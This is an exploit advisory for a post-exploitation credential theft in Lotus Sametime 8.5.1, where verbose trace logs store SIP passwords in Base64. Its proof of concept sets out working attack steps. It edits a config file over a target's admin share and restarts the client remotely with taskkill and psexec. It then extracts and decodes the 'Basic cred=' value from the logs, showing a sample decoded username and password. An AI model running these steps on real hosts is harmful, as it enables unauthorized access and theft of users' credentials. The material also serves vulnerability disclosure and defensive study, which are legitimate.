Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1

[adrianomarciomonteiro]

# Exploit Title:        Post Exploitation - Getting username and password in 
the Lotus Sametime 8.5.1
# Google Dork:          n/a
# Date:                 18/02/2014
# Exploit Author:       Adriano Marcio Monteiro 
<adrianomarciomonte...@gmail.com>
# Vendor Homepage:      http://www.ibm.com/us/en/
# Software Link:        
http://www-01.ibm.com/support/docview.wss?uid=swg24027054
# Version:              8.5.1
# Tested on:            Windows 7 SP1 x86 pt-br
# CVE :                 

Lotus Sametime is an instant messaging application that includes several 
features such as video conferencing, phone calls, etc. .. In case of problems 
the Lotus Sametime provides functionality to register and trace log (Menu: Help 
/ Support / Show Tracker). When you enable verbose logging is possible to 
obtain the user and the user's password (the password is in Base64), according 
to the procedure below. The vulnerability is in telephony.softphone.service 
more specifically in Source Class.Method:

        com.ibm.ws.sip.stack.transport.TransportLayer
        sendMessage

Communication with the server is done via TLS, but the local content 
communication log is saved in clear text and the password is in base 64. Sample 
log:

        Out Message: [172.29.1.121:62444->172.28.10.138:5081/TLS]
        REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0
        Call-ID: 0.CA3.11C8340A9391D37E@172.29.1.121
        CSeq: 1 REGISTER
        From: 
<sips:adriano.monteiro%40meudominio.com...@sipserver.meudominio.com.br:5081>;tag=3996.696000502281
        To: 
sips:adriano.monteiro%40meudominio.com...@sipserver.meudominio.com.br:5081
        Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411
        Max-Forwards: 70        
        Contact: sip:172.29.1.121:5061;transport=tls
        Expires: 0
        User-Agent: Sametime-Softphone-8.5.1.20100709-0934
        Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE
        Authorization: Basic 
cred="YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA=="
        Content-Length: 0

Using a simple script you can automate the process of getting username and 
password, but beyond the scope of this tutorial and I will not explain this 
process here. Use your imagination!

PoC - Proof of Concept

Find the file below:
        “\\host.alvo\c$\Users\<usuario.alvo>\Dados de 
Aplicativos\Lotus\Sametime\.config\rcpinstall.properties”

Add the following lines at the end of the file and save:
        com.ibm.collaboration.realtime.internal.telephony.level=FINE
        com.ibm.collaboration.realtime.telephony.ui.level=FINE
        com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
        com.ibm.collaboration.realtime.telephony.softphone.level=FINER
        com.ibm.collaboration.realtime.telephony.core.level=FINE
        com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE
        com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
        
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
        com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
        
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
        com.ibm.collaboration.realtime.telephony.core.level=FINE
        com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
        com.ibm.collaboration.realtime.telephony.softphone.level=FINER
        com.ibm.collaboration.realtime.internal.telephony.level=FINE
        com.ibm.collaboration.realtime.telephony.ui.level=FINE
        com.ibm.collaboration.realtime.multimedia.level=FINE
        com.ibm.collaboration.realtime.internal.telephony.level=FINE
        com.ibm.collaboration.realtime.telephony.level=FINE
        com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
        com.ibm.collaboration.realtime.telephony.softphone.level=FINER

Restarting the process on the target host:
        taskkill /s host.alvo /f /im sametime.exe
        psexec –d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime 
Connect\rcp\rcplauncher.exe"

In the logs folder:
        \\host.alvo\c$\Users\<usuario.alvo>\Dados de 
aplicativos\Lotus\Sametime\logs

Access the file:
        trace-log-0.xml

Search for:
        Basic cred=

Example:
<CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00" 
globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message: 
[172.29.1.125:58008-&gt;172.28.10.138:5081/TLS]&#xD;&#xA;REGISTER 
sip:server.meudominio.com.br:5081;transport=tls SIP/2.0&#xD;&#xA;Call-ID: 
0.94.52A702A8618A2FE8@172.29.1.125&#xD;&#xA;CSeq: 1 
REGISTER&#xD;&#xA;From:&lt;sips:adriano.monteiro%40meudominio.com...@server.meudominio.com.br:5081&gt;;tag=4518.144797347828&#xD;&#xA;To:
 
&lt;sips:adriano.monteiro%40meudominio.com...@server.meudominio.com.br:5081&gt;&#xD;&#xA;Via:
 SIP/2.0/TLS 
172.29.1.125:5061;branch=z9hG4bK-3811914127572726454&#xD;&#xA;Max-Forwards:70&#xD;&#xA;Contact:
 *&#xD;&#xA;Expires: 0&#xD;&#xA;User-Agent: 
Sametime-Softphone-8.5.1.20100709-0934&#xD;&#xA;Allow: INVITE, ACK, CANCEL, 
BYE, NOTIFY, INFO, MESSAGE,UPDATE&#xD;&#xA;
Authorization: Basic 
cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot;&#xD;&#xA;Content-Length:
 0&#xD;&#xA;&#xD;&#xA;"      severity="10" version="1.0.1">

The username and password found here:
        Authorization: Basic 
cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot;

Getting Username and Password:
        Site:           http://www.base64decode.org/
        Decode:         
YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==
        Result:         adriano.monte...@meudominio.com.br:Amor1010

Bibliography:
http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=%2Fcom.ibm.help.sametime.v85.doc%2Ftrouble%2Ftrbl_client_log_trace.html

[end]